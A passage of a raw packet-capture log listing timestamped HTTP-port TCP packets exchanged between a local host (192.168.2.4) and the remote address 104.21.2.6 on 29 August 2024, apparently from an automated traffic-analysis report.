                                Aug 29, 2024 22:47:01.845695972 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845707893 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845717907 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845719099 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845727921 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845735073 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845740080 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845748901 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845757961 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845774889 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845776081 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845787048 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845798016 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845807076 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845818043 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845822096 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845844984 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845900059 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845915079 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845932007 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.845942020 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845964909 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.845976114 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846425056 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846436977 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846446991 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846474886 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846501112 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846502066 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846512079 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846522093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846539021 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846541882 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846564054 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846580029 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846585989 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846590996 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846607924 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846613884 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846623898 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846626997 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846637011 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846646070 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846649885 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846657991 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846668959 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.846668959 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846692085 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846709013 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.846965075 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847002983 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847040892 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847052097 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847060919 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847079039 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847086906 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847090006 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847101927 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847105980 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847112894 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847120047 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847122908 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847138882 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847143888 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847151041 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847160101 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847162008 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847168922 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847171068 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847192049 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847208977 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847220898 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847232103 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847242117 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847251892 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847258091 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847284079 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847332001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847342968 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847357035 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847373009 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847398996 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847461939 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847474098 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847484112 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847505093 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847522974 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847573996 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847584963 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847594976 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847604990 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847614050 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847616911 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847629070 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847640038 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847642899 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847652912 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847664118 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847664118 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847686052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847698927 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847778082 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847789049 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847799063 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847810030 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847816944 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847820997 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847831964 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847841978 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847846031 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847853899 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847863913 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847870111 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847873926 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847882986 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847903967 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847903967 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847913980 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847923994 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847935915 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847942114 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847945929 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.847963095 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.847989082 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849725962 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849736929 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849746943 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849756956 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849773884 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849785089 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849791050 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849796057 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849806070 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849816084 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849818945 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849828005 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849838018 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849843979 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849863052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849864006 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849874973 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849881887 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849884987 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849900961 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849912882 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849912882 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849922895 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849934101 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849941015 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849944115 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849955082 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849958897 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.849972963 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849984884 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.849991083 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850018978 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850075960 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850085974 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850095034 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850111008 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850115061 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850133896 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850142002 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850143909 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850155115 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850166082 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850167990 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850176096 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850184917 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850186110 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850202084 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850213051 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850213051 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850223064 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850238085 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850249052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850259066 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850266933 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850291967 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850305080 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850316048 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850325108 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.850343943 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.850363970 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932091951 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932105064 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932116032 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932172060 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932214022 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932230949 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932243109 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932254076 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932257891 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932265043 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932286978 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932310104 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932323933 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932358027 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932375908 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932385921 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932411909 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932413101 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932424068 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932425022 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932445049 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932452917 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932473898 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932490110 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932502031 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932512045 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932523966 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932540894 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932703972 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932714939 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932724953 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932738066 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932756901 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932760000 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932770967 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932780981 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932790995 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.932799101 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932806969 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.932833910 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933063984 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933101892 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933103085 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933135986 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933249950 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933259964 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933270931 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933286905 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933300018 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933305979 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933316946 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933317900 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933326960 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933346987 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933358908 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933370113 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933371067 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933382034 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933398008 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933403969 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933414936 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933425903 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933425903 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933435917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933446884 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933448076 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933461905 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933480024 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933491945 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933821917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933831930 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933871984 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933926105 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933937073 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933943033 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933948040 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.933974981 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933974981 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.933974981 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934010029 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934020042 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934031963 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934041977 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934046030 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934053898 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934065104 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934072018 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934098005 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934108973 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934112072 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934119940 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934129953 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934140921 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934161901 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934252977 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934262991 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934273005 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934293032 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934309959 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934326887 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934338093 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934348106 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934359074 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934366941 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934370995 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934381962 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934386015 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934410095 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934423923 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934431076 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934441090 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934452057 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934464931 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934469938 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934480906 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934503078 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934520006 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934530973 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934540987 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934556007 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934556961 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934566975 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934576988 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934576988 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934591055 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934606075 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934607029 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934618950 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934629917 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934629917 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934637070 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934668064 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934715986 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934727907 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934746027 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934751987 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934758902 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934772015 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934776068 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934782982 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.934793949 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.934815884 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936727047 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936738968 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936748981 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936780930 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936796904 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936824083 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936835051 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936846018 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936856985 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936858892 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936867952 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936871052 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936891079 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936903954 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936914921 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936916113 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936927080 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936939001 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936939955 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936949015 CEST8049730104.21.2.6192.168.2.4
                                Aug 29, 2024 22:47:01.936959028 CEST4973080192.168.2.4104.21.2.6
                                Aug 29, 2024 22:47:01.936965942 CEST8049730104.21.2.6192.168.2.4
